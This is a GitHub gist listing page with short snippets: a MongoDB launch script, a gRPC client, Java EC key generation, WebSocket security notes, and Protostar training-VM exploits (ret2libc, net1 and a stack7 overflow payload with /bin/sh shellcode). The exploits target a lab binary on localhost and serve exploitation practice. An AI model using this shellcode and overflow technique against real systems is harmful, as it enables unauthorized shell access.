Skip to content

Instantly share code, notes, and snippets.

#!/bin/bash
echo 0 > /proc/sys/vm/zone_reclaim_mode
ulimit -n 64000
numactl --interleave=all /usr/bin/mongod --config /etc/mongod.conf
@luc-lynx
luc-lynx / final0.py
Created December 18, 2017 07:29
Protostar final0 exploit
# ret2libc technique
import struct
import socket
import telnetlib
HOST = '127.0.0.1'
PORT = 2995
padding = 'a' * 510 + '\x00' + 'aaaabbbbccccddddeeeef'
@luc-lynx
luc-lynx / socktest.py
Created December 17, 2017 15:00
Protostar net1
import socket
import struct
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 2998
s.connect((HOST, PORT))
@luc-lynx
luc-lynx / exploit.py
Created November 1, 2017 08:21
protostar_stack7_exploit
import struct
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
jmp_addr = struct.pack("I", 0x080484bf)
print shellcode + "\x90" * 52 + jmp_addr
@luc-lynx
luc-lynx / WebSockets.md
Created September 2, 2017 20:55 — forked from subudeepak/WebSockets.md
The problems and some security implications of websockets - Cross-site WebSockets Scripting (XSWS)

WebSockets - An Introduction

WebSockets is a modern HTML5 standard which makes communication between client and server a lot more simpler than ever. We are all familiar with the technology of sockets. Sockets have been fundamental to network communication for a long time but usually the communication over the browser has been restricted. The general restrictions

  • The server used to have a permanent listener while the client (aka browser) was not designated any fixed listener for a more long term connection. Hence, every communication was restricted to the client demanding and the server responding.
  • This meant that unless the client requested for a particular resource, the server was unable to push such a resource to the client.
  • This was detrimental since the client is then forced to check with the server at regular intervals. This meant a lot of libraries focused on optimizing asynchronous calls and identifying the response of asynchronous calls. Notably t
@luc-lynx
luc-lynx / grpc_client.py
Created May 29, 2017 07:15
grpc custom authentication scheme example (python)
import grpc
import helloworld_pb2
import helloworld_pb2_grpc
# you need to use secure port,
# otherwise call credentials won't be transmitted
def run():
with open('server.crt', 'rb') as f:
trusted_certs = f.read()
private static ECKey generateECJWK(final ECKey.Curve curve)
throws Exception {
final ECParameterSpec ecParameterSpec = curve.toECParameterSpec();
KeyPairGenerator generator = KeyPairGenerator.getInstance("EC");
generator.initialize(ecParameterSpec);
KeyPair keyPair = generator.generateKeyPair();
final ECPrivateKey privateKey = (ECPrivateKey) keyPair.getPrivate();